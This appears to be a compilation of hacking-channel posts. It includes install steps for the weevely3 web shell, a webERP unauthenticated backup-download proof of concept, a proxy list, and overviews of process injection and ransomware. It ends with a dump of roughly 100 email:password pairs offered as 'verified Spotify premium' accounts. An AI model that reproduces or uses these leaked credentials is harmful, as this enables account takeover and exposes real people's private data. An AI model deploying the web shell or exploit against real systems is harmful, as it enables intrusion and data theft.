▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A list of useful payloads and bypass for Web Application Security and Pentest/CTF
fb.com/UndercodeTesting

🦑FEATURES :

Methodology and Resources
Active Directory Attack.md
Cloud - AWS Pentest.md
Cloud - Azure Pentest.md
Cobalt Strike - Cheatsheet.md
Linux - Persistence.md
Linux - Privilege Escalation.md
Metasploit - Cheatsheet.md
Methodology and enumeration.md
Network Pivoting Techniques.md
Network Discovery.md
Reverse Shell Cheatsheet.md
Subdomains Enumeration.md
Windows - Download and Execute.md
Windows - Mimikatz.md
Windows - Persistence.md
Windows - Post Exploitation Koadic.md
Windows - Privilege Escalation.md
Windows - Using credentials.md
CVE Exploits

🦑 DOWNLOAD :
https://github.com/swisskyrepo/PayloadsAllTheThings


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FRESH PREMIUM PROXIES :
instagram.com/undercodetesting

103.209.65.12 6666 1 hour ago
3752 ms 8% (68) in India - Valsad Elite -
113.254.104.207 80 1 hour ago
851 ms 2% (73) hk Hong Kong - Central Elite -
115.223.2.114 80 1 hour ago
1268 ms 50% (48) cn China - Wuhan Elite -
186.229.25.18 8080 1 hour ago
3966 ms 30% (75) br Brazil - Rio de Janeiro Elite -
190.210.8.93 8080 1 hour ago
3592 ms 7% (66) ar Argentina - Buenos Aires Elite -
191.241.34.222 8089 1 hour ago
3945 ms 25% (33) br Brazil - Caucaia Elite -
203.218.82.122 8080 1 hour ago
766 ms 44% (50) hk Hong Kong - Central Elite -
223.68.190.130 8181 1 hour ago
2639 ms 39% (60) cn China - Yangzhou Elite -
43.224.8.14 6666 1 hour ago
3591 ms 8% (75) in India - Vadodara Elite -
47.89.193.30 8118 1 hour ago
147 ms 2% (70) us United States - San Mateo Elite -
149.28.180.233 8081 1 hour ago
1607 ms 79% (19) us United States Elite -
167.99.166.194 8081 1 hour ago
1356 ms 6% (91) us United States - Santa Clara Elite -


170.254.150.166 80 1 hour ago
2523 ms 59% (46) br Brazil Elite -
167.71.198.204 8080 1 hour ago
1810 ms 84% (50) us United States Elite -
181.118.167.104 80 1 hour ago
721 ms 98% (43) cl Chile - Santiago Elite -
182.23.81.82 3128 1 hour ago
3245 ms 19% (72) id Indonesia - Jakarta Elite -
185.10.166.130 8080 1 hour ago
4166 ms 20% (66) gb United Kingdom - London Elite -
103.141.180.130 8080 1 hour ago
3554 ms 16% (66) id Indonesia Elite -
103.216.82.199 6666 1 hour ago
3984 ms 9% (83) in India - Ahmedabad Elite -
118.25.35.202 9999 1 hour ago
2175 ms 34% (60) cn China Elite -
122.233.234.32 8118 1 hour ago
2756 ms 36% (50) cn China Elite -
123.252.173.162 80 1 hour ago
4373 ms 20% (68) in India Elite -
134.249.141.148 80 1 hour ago
3517 ms 21% (74) ua Ukraine - Lviv Elite -
140.227.238.18 1000 1 hour ago
2500 ms 20% (66) jp Japan Elite -
35.222.208.56 3128 1 hour ago
762 ms 80% (50) us United States Elite -
36.55.230.146 8888 1 hour ago
2511 ms 20% (80) jp Japan - Kanazawa Elite -
31.131.67.14 8080 1 hour ago
3489 ms 15% (68) ru Russia - Moscow Elite -
52.161.188.148 80 1 hour ago
332 ms 100% (16) us United States Elite -
52.163.87.222 8080 1 hour ago
1253 ms 88% (16) sg Singapore Elite -
78.46.40.154 8118 1 hour ago
1190 ms 16% (75) de Germany - Nuremberg Elite -
79.137.123.252 3131 1 hour ago
774 ms 8% (76) fr France Elite -
79.137.44.85 3129 1 hour ago
2379 ms 65% (67) es Spain - Madrid Elite -
82.119.170.106 8080 1 hour ago
882 ms 85% (53) de Germany - Berlin Elite -
85.90.215.111 3128 1 hour ago
3012 ms 27% (65) ua Ukraine - Kharkiv Elite -
84.42.247.101 3128 1 hour ago
3790 ms 25% (68) cz Czech Republic - Prague Elite -

@uNDERCODEtESTING
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑updated Weaponized web shell
pinterest.com/Undercode_Testing

🦑FEATURES :

Shell access to the target
SQL console pivoting on the target
HTTP/HTTPS proxy to browse through the target
Upload and download files
Spawn reverse and direct TCP shells
Audit remote target security
Port scan pivoting on target
Mount the remote filesystem
Bruteforce SQL accounts pivoting on the target

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/epinna/weevely3.git

2) cd weevely3

3) Make sure that the python package manager and yaml libraries are installed

4) $ sudo apt-get install -y python3 python3-pip curl

5) $ cd weevely3/

6) $ sudo pip3 install -r requirements.txt --upgrade

🦑 OS X

OS X
OS X requires Python3 to be installed in the system. Follow the following commands to install manually gnureadline Python package.

$ sudo pip3 install gnureadline
$ cd weevely3/
$ sudo pip3 install -r requirements.txt --upgrade

@uNDERCODEtESTING
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 EXPLOIT VERIFIED BY UNDERCODERS :

# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
# Date: 2020-05-01
# Author: Besim ALTINOK
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15.1
# Tested on: Xampp
# Credit: İsmail BOZKURT

--------------------------------------------------------------------------
About Software:

webERP is a complete web-based accounting and business management system
that requires only a web-browser and pdf reader to use. It has a wide range
of features suitable for many businesses particularly distributed
businesses in wholesale, distribution, and manufacturing.

-------------------------------------------------------
PoC Unauthenticated Backup File Access
---------------------------------------------

1- This file generates new Backup File:
http://localhost/webERP/BackUpDatabase.php
2- Someone can download the backup file from:
--
http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz


@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Real-world examples of process injections in action
DoublePulsar tut :
t.me/UndercodeTesting

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :


> An analysis of the kernel mode payload of the famous DoublePulsar code by F-Secure revealed that it utilizes a form of DLL injection to load a DLL into a target process (in this case, lsass.exe) using an Asynchronous Procedure Call (APC). It did not utilize the standard Windows API commands such as LoadLibrary and did not write the DLL to disk, making it stealthier.

1) Cobalt Strike
Cobalt Strike is a penetration testing software that was designed to execute targeted attacks and emulate post-exploitations actions of advanced threat actors through a listener called a beacon.

2) Cobalt Strike commands such as keylogger, screenshot and so on were designed to be injected into another process for it to work. The listener is injected into a specific process (a personal favorite is explorer.exe because the process is always running in a GUI environment) and the keystroke logger will monitor all keystrokes via the infected process. It then reports them to the beacon console without writing to disk. This only stops when the process terminates or the keystroke logger job is terminated by the user.

3) Lazarus Group
The Lazarus Group (also known as “Hidden Cobra”) is a threat group headquartered in North Korea whose malicious activities span across multiple years, as far back as 2009. Since 2016, the group has been conducting “FASTCash” attacks — stealing money from ATMs from target banks in Africa and Asia. The target bank’s network is compromised and a malware known as Trojan.Fashcash is deployed on the network.

> An analysis of the malware reveals that malicious Advanced Interactive eXecutive (“AIX”) executable files are injected into legitimate processes on the payment application servers used in handling ATM transactions. The executable allows the group to monitor, intercept and generate responses to fraudulent transaction requests using fake ISO 8583 (standard used for financial transaction messaging) messages. This allows attempts to withdraw cash via an ATM to be successful.

5) APT41
APT41 is a threat group headquartered in China and known for carrying out Chinese state-sponsored espionage campaigns dating as far back as 2012.

> The group is known for its software supply chain attacks, where TTPs developed from accessing video game production environments are utilized. These TTPs are used to compromise software companies and malicious codes are injected into software updates distributed to victim organizations.

4) WINTERLOVE is a backdoor used by the group to load and execute remote code in a running process (e.g., iexplorer.exe) and can be used to enumerate system files and directories.

5) Mitigation/prevention
DLL injection is not necessarily a bad technique as many applications use it for legitimate purposes such as your Antivirus/Endpoint Detection and Response (“EDR”)7 solutions which inject their own codes/agents into running processes in order to monitor the process and detect abnormal activities. Therefore, making it hard to detect especially since it runs under a legitimate process.

6) Behavior analysis
This method can be achieved by configuring your EDRs to detect cross-process events such as injection of code into a running process, duplicate processes running, remote threads and so on.

7) EDRs work by gathering, monitoring and analyzing endpoint activities/events. This gives the security team the necessary visibility to carry out further analysis, detection, investigation and mitigation into advanced cyber threats across all endpoints running an EDR.

As part of their response capabilities, EDRs can be configured to block certain types of process injection, depending on the behavior that occurs during the injection process.

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 PAID PDF COLLECTIONS

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MOST ACTIVE RANSOMWARE 2019-2020 :
T.me/UndercodeTesting


1) STOP (DJVU)
The STOP ransomware strain, also known as DJVU, has been submitted to the ID Ransomware tool over 75,000 times, which only represent a sliver of the systems it may have affected worldwide.

STOP affects the systems of home users and can be easily picked up by downloading unsecure files from torrent sites. Once the infection begins the STOP malware will use the AES-256 encryption to lock the system files, followed by a payment demand issued to the user. It is by far the most common submission to ID Ransomware as it accounts for 56 percent of all submissions.

2 ) Dharma
The Dharma variant not only will lock a system, but it will instruct the victim to contact a specific email where they are expected to negotiate the release of their files. Dharma is a cryptovirus which is pushed onto system via malicious download links and email hyperlinks.

Operating in the threat landscape since 2016, Dharma is part of the .cezar family. It mainly targets enterprise targets. Dharma accounted for 12 percent of submissions.

3 )Phobos
Ransomware 2019
Credit: Luca Ruegg via Unsplash
Phobos, either named after the Martian moon or its namesake the Greek god of fear, is a ransomware variant that makes up 8.9 percent of all submissions.

It is mainly spread via exploits of insufficiently secured Remote Desktop Protocol ports. Phobos has been seen in the wild attacking corporations and public bodies indiscriminately. In a similar manner to Dharma this ransomware locks your files and then request you contact the attacker directly to negotiate their release.

4) GlobeImposter
GlobeImposter makes up 6.5 percent of all submissions to the ID Ransomware tool. GlobeImposter is the next evolution on pervious strains of the variant. What makes it different is it uses AES-256 cryptography to encrypt a victim’s files before it issues a bitcoin payment demand.

5 )REvil
REvil also known as Sodinokibi was first discovered in 2019 and security research believe that it was developed by the same threat actors who created GandCrab.

Emsisoft notes that Sodinokibi is seen as a “Ransomware-as-a-service that relies on affiliates to distribute and market the ransomware. It is extremely evasive and uses advanced techniques to avoid being detected by security software.”

The attack vectors for this variant include exploiting a vulnerability in Oracle WebLogic and more traditional methods such as phishing campaigns. It makes up 4.5 percent of submissions.

The ransomware 2019 threat landscape is woefully vibrant as hackers continues to see value in targeting enterprises, public bodies and governments.
Countries most affected by ransomware Credit: Emsisoft

6) GandCrab
According to Europol the GandCrab ransomware variant has infected nearly half a million victim systems since it was first detected at the start of 2018. It accounts for 3.6 percent of submissions.

The GandCrab virus infects and encrypts all the files within a user’s systems. Originally the ransomware was distributed via exploit kits such as RIG EK and GrandSoft EK. Cybersecurity company Bitdefender has created a useful decrypting tool to help mitigate GandCarb lock-outs.

7) Magniber
Magniber has been around in one form or another since 2013, but it still accounts for 3.3 percent of submissions.

Cybersecurity firm Malwarebytes have been tracking this variant for some time and noticed that it is continually evolving. In one of the latest version they state that: “Each file is encrypted with a unique key—the same plaintext gives a different ciphertext. The encrypted content has no patterns visible. That suggests that a stream cipher or a cipher with chained blocks was used (probably AES in CBC mode).”

8 )Scarab
Ransomware 2019
Credit: Timothy Dykes via Unsplash
The Scarab ransomware was first discovered in June 2017. The malicious software uses the encryption algorithms AES-256 and RSA-2048 to lock the files on a targeted system. It makes up 2.0 percent of submissions.

Cyber security firm Symantec notes that: “Many of Scarab’s campaigns focus on distributing the group’s custom malware (Trojan.Scieron and Trojan.Scieron.B) through emails with malicious attachments. These files contain exploits that take advantage of older vulnerabilities that are already patched by vendors. If the attackers successfully compromise the victims’ computers, then they use a basic back door threat called Trojan.Scieron to drop Trojan.Scieron.B onto the computer.”

9 )Rapid
Rapid accounts for 1.8 percent of submissions. It is a ransomware that acts as a trojan horse to encrypted files and then demand a ransom.

Rapid busted onto the scene in 2018. When it infects a systems it will remove all of the Windows shadow volume copies stop all database processes and take automatic repair offline. Once files are encrypted like the others it will issues a ransom demand.

10) Troldesh
Troldesh also known as Shade accounts for 1.4 percent of submissions. Troldesh is a Trojan horse that locks files in a system via an encryption method. The malware has been around since 2014, but is still used in many active ransomware campaigns.

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 VERIFIED SPOOTIFY PREMIUM :
T.me/UndercodeTesting

George_Zimmermann7526@hotmail.de:zxcvbnm2325
King_Jung884@hotmail.de:lucifer7689
Dominic_Dietrich5955@hotmail.de:1313131721
Chad_Hahn90563@gmail.com:smiley7710
Hunter_Pohl059@gmail.com:redrum5310
Zander_Bergmann478@hotmail.de:amour7661
Victor_Meier21@gmx.com:nicholas6045
Luciano_Schafer1933@yahoo.com:alpine4537
Jorge_Majller371@outlook.de:forward8202
Achilles_Bauer224@yahoo.com:christ4724
Ethan_Schmitt22692@yahoo.com:aptiva9352
Mack_Schulte7543@gmx.com:darryl2411
Sterling_Fischer26@gmail.com:sex3335
Emery_Schumacher347@yahoo.com:iloveu9312
Kingsley_Dietrich08730@yahoo.com:enrique9745
Melvin_Meier3078@hotmail.de:valerie9940
Jakob_Hartmann90@gmx.com:murphy5829
Casey_Beck80627@hotmail.de:angeles9945
Gerald_Berger15@t-online.de:success2679
Axton_Hartmann832@t-online.de:gabriela9389
Logan_Kajnig47294@gmx.com:liliana9696
Blake_Zimmermann64116@hotmail.de:nokia8541
Caden_Schulze0382@outlook.de:broken1231
Merrick_Schulz97604@gmail.com:jackson3625
Daxton_Klein14@outlook.de:angel6126
Gianni_Seidel30027@t-online.de:7418524356
Lorenzo_Pohl94@outlook.de:master5229
Johan_Fuchs50220@outlook.de:angelica9454
Jedidiah_Klein876@hotmail.de:brandy6713
Ace_Fischer027@yahoo.com:banana6786
Ryan_Otto54397@hotmail.de:Summer1942
Walker_Voigt2444@hotmail.de:mallard8957
Camilo_Haas523@hotmail.de:chance2909
Karter_Ganther1613@yahoo.com:pussy14701
Achilles_Wagner294@gmail.com:quality6855
Will_Busch91@gmx.com:test19685
Salvador_Miller9676@hotmail.de:bogey5426
Maverick_Neumann522@gmail.com:the5483
Richard_Krager87876@outlook.de:dutchess7798
Uriel_Winter57@gmx.com:creative1182
Parker_Kajnig10695@yahoo.com:santa7051
Markus_Schulz739@yahoo.com:jordan235036
Frank_Lehmann8736@outlook.de:justice2350
Aidan_Weiay88356@yahoo.com:marisol4782
Porter_Schulte308@gmx.com:bills3480
Alvaro_Schafer98315@outlook.de:tree2011
Boone_Vogt13@gmail.com:doug7621
Manuel_Busch66998@yahoo.com:dilbert4886
Jairo_Haas06@t-online.de:connie5637
Jasper_Krause4494@outlook.de:cuteme3131
Cassius_Maier84@t-online.de:admin7344
Samuel_Fuchs41@gmail.com:patriots8123
Sincere_Neumann052@outlook.de:airborne3088
Nelson_Krager45@yahoo.com:nesbitt3940
Marshall_Krager4619@gmail.com:daddy1306
Francisco_Schulte85@yahoo.com:florida4263
Briggs_Pfeiffer9063@gmail.com:sapphire3167
Toby_Kuhn17673@outlook.de:magnum1443
Guillermo_Becker3884@gmail.com:bubblegum1003
Jonathan_Walter0211@hotmail.de:dawn4066
Eduardo_Ludwig609@gmx.com:thorne1238
Bentley_Wagner602@t-online.de:santa4312
Rafael_Bajhm8001@outlook.de:deeznuts8428
Louie_Walter967@outlook.de:bailey9421
Anson_Albrecht911@yahoo.com:gandalf5649
Ari_Hahn422@outlook.de:kerala7500
Malcolm_Pohl0551@t-online.de:techno6633
Apollo_Simon325@hotmail.de:stingray7508
Kolten_Schulze90@outlook.de:Maxwell4129
Edison_Herrmann971@gmail.com:myself5604
Henry_Fischer5429@outlook.de:rufus5506
Gage_Hahn3495@hotmail.de:trinity1299
Luca_Arnold49@gmail.com:metallic6894
Arthur_Schmidt04@outlook.de:kleenex5812
Jon_Hofmann64864@outlook.de:steel7941
Fox_Meyer1475@gmail.com:grace1735
Kyree_Schmid535@gmail.com:intrepid4738
Rowen_Schmid38@yahoo.com:homerj8106
Leonardo_Peters54@gmx.com:kate6309
Leonidas_Seidel709@gmx.com:maverick4781
Luis_Vogel980@yahoo.com:gangsta1411
Javon_Lang96019@t-online.de:fishie9146
Antonio_Kahn49108@outlook.de:dillweed3518
Jimmy_Huber11300@yahoo.com:steph15935
Chandler_Herrmann30@yahoo.com:wolf2064
Jairo_Koch316@yahoo.com:richard4074
Bryan_Voigt08856@outlook.de:national3177
Finnley_Albrecht96@gmx.com:wanker2036
Louis_Brandt8966@hotmail.de:duckie9713
Beau_Franke098@yahoo.com:chandler9502
Keegan_Martin51452@hotmail.de:captain3884
Bishop_Berger97712@outlook.de:ronaldo3837
Dominique_Berger37154@hotmail.de:sam4919
Roberto_Frank7998@t-online.de:nicolas8481
Curtis_Seidel5770@t-online.de:millie9708
Mike_Schmitt080@t-online.de:maxime7701
Rhett_Ludwig159@gmail.com:buddy1384
Clark_Ludwig1028@outlook.de:lights5971
Phillip_Berger136@outlook.de:pasaway3892
Leonard_Majller59@gmx.com:2222221715
Emiliano_Groay833@gmx.com:hamilton7216
Taylor_Fischer64@gmx.com:cyrano5482
William_Vogel3135@yahoo.com:red7753